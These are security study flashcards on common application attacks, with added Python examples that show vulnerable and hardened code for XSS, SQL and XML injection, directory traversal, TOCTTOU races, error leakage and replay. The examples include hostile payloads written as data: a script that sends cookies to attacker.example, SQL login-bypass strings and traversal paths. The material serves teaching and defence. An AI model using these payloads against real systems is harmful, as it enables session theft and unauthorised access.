Application Attacks Flashcards
What is Privilege escalation
Vertical privilege escalation (or elevation) is where a user or application can access functionality or data that should not be available at their current privilege level. For instance, a process might run with local administrator privileges, but a vulnerability allows arbitrary code to run with higher, SYSTEM-level privileges.
Horizontal privilege escalation is where a user accesses functionality or data that is intended for another user at the same privilege level. For instance, a user changes an account identifier in a request and reads another customer's records, or arbitrary code running under a local administrator account on a client workstation is used to execute as a different domain account on an application server.
What is Cross-site scripting
Exploits the fact that the browser trusts scripts that appear to come from a site the user has chosen to visit: an injected script runs with that site's origin and can read its cookies and page content.
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
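As an added example (not from the flashcards), the following Python renders user input into two HTML contexts, the element body and a quoted attribute value, first without encoding and then with `html.escape`. The payloads and the small HTMLParser-based audit that reports whether the output would execute script are constructed for this illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs (not from the flashcards): a payload for the HTML text
# context and a payload for a quoted attribute context.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(document.domain)'


def render_comment_unsafe(comment):
    """Vulnerable: user input is concatenated straight into the page body, so the
    browser parses the injected <script> as part of the site's own markup."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Hardened: encode for the HTML text context. '<' becomes '&lt;', so the
    payload is displayed as text rather than parsed as an element."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_search_unsafe(term):
    """Vulnerable: input placed inside a quoted attribute value without encoding,
    so a '"' in the input closes the value and the rest becomes new attributes."""
    return f'<input type="text" name="q" value="{term}">'


def render_search_safe(term):
    """Hardened: quote=True also encodes '"' and "'", so the value cannot be closed
    early and no event-handler attribute can be added."""
    return f'<input type="text" name="q" value="{html.escape(term, quote=True)}">'


class _MarkupAudit(HTMLParser):
    """Tokenizes rendered HTML the way a browser would and records anything that
    would execute script: <script> elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers.extend(name for name, _ in attrs if name.startswith("on"))


def executes_script(rendered):
    """True if the rendered fragment would run attacker-controlled script."""
    audit = _MarkupAudit()
    audit.feed(rendered)
    audit.close()
    return audit.script_tags > 0 or bool(audit.event_handlers)


if __name__ == "__main__":
    for label, out in [("unsafe comment", render_comment_unsafe(SCRIPT_PAYLOAD)),
                       ("safe comment", render_comment_safe(SCRIPT_PAYLOAD)),
                       ("unsafe search", render_search_unsafe(ATTRIBUTE_PAYLOAD)),
                       ("safe search", render_search_safe(ATTRIBUTE_PAYLOAD))]:
        print(f"{label:15} executes script: {executes_script(out)}  {out}")
```

The point of the attribute case is that encoding is context-specific: `html.escape` without `quote=True` would neutralize the `<script>` payload but still let the `"` in the attribute payload close the value.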
What are injection attacks
Injection attacks can target any protocol or language where the application takes user input to construct a query, filter, or document (SQL queries, LDAP filters and XML documents are the cases covered below). The input is placed where the interpreter expects code or structure, so it changes what the query does rather than merely what it searches for.
What is Structured query language (SQL) injection attack
In a SQL injection attack, the threat actor modifies one or more of the basic query functions (SELECT, INSERT, UPDATE, DELETE) by adding code to some input accepted by the app, causing it to execute the attacker's own set of SQL queries or parameters.
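As an added example (not from the flashcards), this Python builds a small in-memory SQLite table and shows a login query written by string concatenation, which an input such as `alice' --` turns into a different query, beside the parameterized form, where the same input is only ever compared as data. The table contents and credentials are constructed for the illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table (not from the flashcards)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable: the input is pasted into the SQL text, so a quote ends the
    string literal and what follows is executed as part of the WHERE clause.
    With username = "alice' --" the password check is commented out entirely."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn, username, password):
    """Hardened: the statement is fixed text and the values travel separately.
    The driver never parses the input as SQL, so quotes, OR and -- are just
    characters to compare against the column."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("alice' --", "wrong"), ("' OR '1'='1", "' OR '1'='1"), ("bob", "hunter2")]:
        print(f"{user!r:22} vulnerable={login_vulnerable(db, user, pw)} "
              f"parameterized={login_parameterized(db, user, pw)}")
```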
What is Dynamic link library (DLL)
Is a binary package that implements some sort of standard functionality, such as establishing a network connection or performing cryptography.
DLL injection abuses a legitimate feature of the operating system, the ability of one process to attach to another (provided for debugging and hooking), to force a legitimate process to load a malicious link library. The attacker's code then runs inside a trusted process, with that process's privileges and identity.
What is Lightweight directory access protocol (LDAP) injection attack
Another example of a query language. LDAP is specifically used to read and write network directory databases. A threat actor could exploit either unauthenticated access or a vulnerability in a client app to submit arbitrary LDAP queries.
What is Extensible markup language (XML) injection attack
XML is used by apps for authentication and authorization, and for other types of data exchange and uploading. Data submitted via XML with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code: user input concatenated into a document can close the element it was meant to fill and add elements of the attacker's choosing.
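As an added example (not from the flashcards), this Python builds a user-profile document two ways, by string concatenation and with the `xml.etree.ElementTree` API, and parses the result as a consumer that reads the first `<role>` child would. The document layout and the payload are constructed for the illustration.

```python
import xml.etree.ElementTree as ET

# Constructed payload (not from the flashcards): closes <name>, injects a <role>,
# and reopens <name> so that the finished document is still well-formed.
ROLE_INJECTION = "eve</name><role>admin</role><name>"


def build_profile_vulnerable(display_name):
    """Vulnerable: the user-supplied name is concatenated into the document, so a
    name containing markup becomes markup."""
    return f"<user><name>{display_name}</name><role>user</role></user>"


def build_profile_safe(display_name):
    """Hardened: build the tree with the XML library, which serializes the name
    as character data ('<' becomes '&lt;') so it can never become an element."""
    user = ET.Element("user")
    ET.SubElement(user, "name").text = display_name
    ET.SubElement(user, "role").text = "user"
    return ET.tostring(user, encoding="unicode")


def profile_role(xml_doc):
    """A consumer that takes the first <role> child of <user>."""
    return ET.fromstring(xml_doc).find("role").text


def profile_name(xml_doc):
    return ET.fromstring(xml_doc).find("name").text


if __name__ == "__main__":
    for builder in (build_profile_vulnerable, build_profile_safe):
        doc = builder(ROLE_INJECTION)
        print(f"{builder.__name__}: role={profile_role(doc)!r} name={profile_name(doc)!r}")
        print("   ", doc)
```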
What is Pointer/object dereference
A pointer is a variable that stores a memory location rather than a value. Attempting to read or write the memory at that address via the pointer is called dereferencing. If the memory location is invalid or null (perhaps because a malicious process altered the execution environment), dereferencing raises a null pointer dereference exception and the process will most likely crash. In some circumstances, this might also allow a threat actor to run arbitrary code.
A race condition is one means of engineering a null pointer dereference exception.
What is Directory traversal
Another type of injection attack performed against a web server. The threat actor submits a request for a file outside the web server's root directory by including path segments that navigate to the parent directory (../). This attack can succeed if the input is not filtered or canonicalized properly and the web server's account has permission to read the target file.
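As an added example (not from the flashcards), this Python resolves a requested path against a document root two ways: a plain `os.path.join`, which lets `..` climb out of the root and lets an absolute request path discard the root altogether, and a canonicalize-then-contain check using `os.path.realpath` and `os.path.commonpath`. The temporary site layout and file contents are constructed for the illustration.

```python
import os
import tempfile


def resolve_vulnerable(web_root, requested):
    """Vulnerable: no check at all. '..' segments walk upward, and if requested is
    absolute, os.path.join() discards web_root entirely."""
    return os.path.join(web_root, requested)


def resolve_safe(web_root, requested):
    """Hardened: canonicalize (resolving '..' and symlinks) and then require the
    result to still lie under the canonical root. Returns None when it does not."""
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def serve(resolver, web_root, requested):
    """Read the resolved file as a static web server would; None if refused."""
    path = resolver(web_root, requested)
    if path is None:
        return None
    with open(path, "rb") as f:
        return f.read()


def make_site():
    """Constructed layout (not from the flashcards): <tmp>/www/index.html is the only
    file meant to be served; <tmp>/secret.txt sits one level above the root."""
    base = tempfile.mkdtemp()
    web_root = os.path.join(base, "www")
    os.mkdir(web_root)
    with open(os.path.join(web_root, "index.html"), "wb") as f:
        f.write(b"<h1>hello</h1>")
    with open(os.path.join(base, "secret.txt"), "wb") as f:
        f.write(b"db_password=constructed")
    return web_root


if __name__ == "__main__":
    root = make_site()
    for req in ("index.html", "../secret.txt", "/etc/hostname"):
        print(f"{req:15} vulnerable -> {resolve_vulnerable(root, req)}")
        print(f"{'':15} safe       -> {resolve_safe(root, req)}")
```

Checking for the literal string `..` is not enough on its own: the comparison has to be made on the canonical path, after URL decoding has happened and after symlinks are resolved, which is why the safe resolver canonicalizes both sides before comparing.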
What are buffer overflows
A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer, so that the excess overwrites whatever is stored next to it. One of the most common forms is a stack overflow, where the adjacent memory holds control data such as a function's return address.
What are race conditions
Occur when the outcome from an execution process is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.
What is Time of check/time of use
A time of check to time of use (TOCTTOU) race condition occurs when there is a change between when an app checked a resource and when the app used the resource. This change invalidates the check. An attacker that can identify a TOCTTOU vulnerability will attempt to manipulate data after it has been checked but before the application can use this data to perform some operation.
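As an added example (not from the flashcards) covering both the race condition and TOCTTOU cards, this Python reads a configuration file first with a check-then-open sequence (stat the name, then open the name) and then with an open-then-check sequence (open with `O_NOFOLLOW`, then `fstat` the descriptor actually held). Because a real race is timing-dependent, the attacker's window is modelled by an optional hook that runs between the check and the use; the hook, the file names and contents are constructed for the illustration, and the code assumes a POSIX host (Linux or macOS) for `os.O_NOFOLLOW`.

```python
import os
import stat
import tempfile


def read_config_vulnerable(path, attacker_hook=None):
    """Vulnerable: the check (is it a symlink?) and the use (open it) are two
    separate system calls on a *name*. Whatever the name points to can change
    in between, so the check proves nothing about what gets opened."""
    if os.path.islink(path):
        raise PermissionError("symlinks are not allowed")
    if attacker_hook is not None:
        attacker_hook()          # models the attacker winning the race here
    with open(path, "rb") as f:
        return f.read()


def read_config_safe(path, attacker_hook=None):
    """Hardened: open first, refusing to follow a symlink at the final component,
    then inspect the object we actually hold via its descriptor. There is no
    window, because the check and the use refer to the same open file."""
    if attacker_hook is not None:
        attacker_hook()          # even a swap before the open is caught
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # OSError (ELOOP) if a symlink
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("not a regular file")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:
        return f.read()


def make_scenario():
    """Constructed layout (not from the flashcards): a harmless app.conf and a
    secret.key the reader must not be able to read through the config path.
    Returns the config path and a callable that swaps it for a symlink."""
    base = tempfile.mkdtemp()
    config = os.path.join(base, "app.conf")
    secret = os.path.join(base, "secret.key")
    with open(config, "wb") as f:
        f.write(b"debug=false\n")
    with open(secret, "wb") as f:
        f.write(b"SECRET")

    def swap_for_symlink():
        os.remove(config)
        os.symlink(secret, config)

    return config, swap_for_symlink


if __name__ == "__main__":
    config, swap = make_scenario()
    print("vulnerable, raced:", read_config_vulnerable(config, attacker_hook=swap))
    config, swap = make_scenario()
    print("safe, no race:    ", read_config_safe(config))
    try:
        read_config_safe(config, attacker_hook=swap)
    except OSError as exc:
        print("safe, raced:       refused:", exc)
```

The general rule the safe version follows is to make security decisions about the object you hold (a file descriptor, an opened handle, a fetched row) rather than about a name that something else can re-point.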
What is Error handling
An application attack may cause an error message. In Windows, this may be of the following types: “Instruction could not be read or written,” “Undefined exception,” or “Process has encountered a problem.” One issue for error handling is that the application should not reveal configuration or platform details that could help an attacker. For example, an unhandled exception on a web application might show an error page that reveals the type and configuration of a database server.
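As an added example (not from the flashcards), this Python contrasts a request handler that returns the raw exception text to the client with one that returns a generic message plus an opaque reference and records the detail only in the server log. The failing database call, its connection string and the in-memory log handler are constructed for the illustration.

```python
import logging
import uuid


class _ListHandler(logging.Handler):
    """Keeps formatted log records in memory so the example can show what stayed
    server-side; a real deployment would ship these to its log pipeline."""

    def __init__(self):
        super().__init__()
        self.messages = []

    def emit(self, record):
        self.messages.append(self.format(record))


log = logging.getLogger("app.errors")
log.propagate = False
SERVER_LOG = _ListHandler()
SERVER_LOG.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
log.addHandler(SERVER_LOG)


class DatabaseError(Exception):
    pass


def connect_db():
    """Constructed failure (not from the flashcards) carrying the sort of detail a
    real driver error includes: host, port, database name and credentials."""
    raise DatabaseError("connection to postgres://app:Sup3rS3cret@db.internal:5432/prod refused")


def handle_request_leaky():
    """Unhandled-exception style: the exception text goes straight to the client,
    telling an attacker the platform, the host and in this case the password."""
    try:
        connect_db()
        return 200, "ok"
    except Exception as exc:
        return 500, f"Internal Server Error: {exc}"


def handle_request_safe():
    """Generic client message plus an opaque reference; the full detail and the
    traceback are logged under that reference for the operators only."""
    try:
        connect_db()
        return 200, "ok"
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.exception("request failed ref=%s", ref)
        return 500, f"Something went wrong. Reference: {ref}"


if __name__ == "__main__":
    print(handle_request_leaky())
    print(handle_request_safe())
    print("server log:", SERVER_LOG.messages[-1].splitlines()[0])
```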
What is Improper input handling
Most software accepts user input of some kind, whether the input is typed manually or passed to the program by another program, such as a browser passing a URL to a web server or a Windows process using another process via its application programming interface. Good programming practice dictates that input should be tested to ensure that it is valid; that is, the sort of data expected by the receiving process. Most application attacks work by passing invalid or maliciously constructed data to the vulnerable process. There are many ways of exploiting improper input handling, but many attacks can be described as either overflow-type attacks or injection-type attacks.
What is Replay attack
An attack where the attacker intercepts some authentication data and reuses it to try to re-establish a session.
Works by sniffing or guessing the token value and then submitting it to re-establish the session illegitimately.
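As an added example (not from the flashcards), this Python shows one standard defence against replaying a captured request: the client binds a timestamp and a fresh nonce into an HMAC over the request, and the server rejects anything stale, anything whose signature does not match, and any nonce it has already accepted within the freshness window. The shared secret, the request and the fixed clock values are constructed for the illustration.

```python
import hashlib
import hmac
import os
import time

# Constructed shared secret (not from the flashcards); a real deployment issues one per client.
SECRET = b"constructed-shared-secret"


def _canonical(method, path, body, ts, nonce):
    """Everything the server will check is bound into the signed message, so the
    captured signature is only valid for this exact request, time and nonce."""
    return "\n".join([method, path, ts, nonce, hashlib.sha256(body).hexdigest()]).encode()


def sign_request(secret, method, path, body, now=None, nonce=None):
    """Client side: attach a timestamp, a fresh random nonce and an HMAC-SHA256 tag."""
    ts = str(int(time.time() if now is None else now))
    nonce = nonce or os.urandom(16).hex()
    sig = hmac.new(secret, _canonical(method, path, body, ts, nonce), hashlib.sha256).hexdigest()
    return {"ts": ts, "nonce": nonce, "sig": sig}


class ReplayGuard:
    """Server side: each signed request is accepted at most once. Nonces only need
    to be remembered for the freshness window; outside it the timestamp check
    rejects the request anyway, which keeps the seen-set bounded."""

    def __init__(self, secret, window=300):
        self.secret = secret
        self.window = window
        self.seen = {}                      # nonce -> timestamp it was accepted with

    def verify(self, method, path, body, headers, now=None):
        now = time.time() if now is None else now
        ts = int(headers["ts"])
        if abs(now - ts) > self.window:
            return "stale"
        expected = hmac.new(self.secret,
                            _canonical(method, path, body, headers["ts"], headers["nonce"]),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, headers["sig"]):
            return "bad signature"           # tampered body/path, or a forged tag
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if headers["nonce"] in self.seen:
            return "replay"                  # the sniffed request, resubmitted
        self.seen[headers["nonce"]] = ts
        return "ok"


if __name__ == "__main__":
    T = 1_700_000_000
    body = b'{"to":"bob","amount":100}'
    guard = ReplayGuard(SECRET)
    captured = sign_request(SECRET, "POST", "/transfer", body, now=T)
    print("first delivery:", guard.verify("POST", "/transfer", body, captured, now=T + 1))
    print("replayed:      ", guard.verify("POST", "/transfer", body, captured, now=T + 2))
    print("tampered:      ", guard.verify("POST", "/transfer", b'{"to":"eve","amount":100}', captured, now=T + 2))
    print("replayed late: ", guard.verify("POST", "/transfer", body, captured, now=T + 1000))
```

A bare session cookie or bearer token has none of this: whoever captures it can present it again until it expires, which is exactly the replay the card describes. The signature alone is not enough either, since the captured tag is still valid for the captured request; it is the nonce bookkeeping that makes the second submission fail.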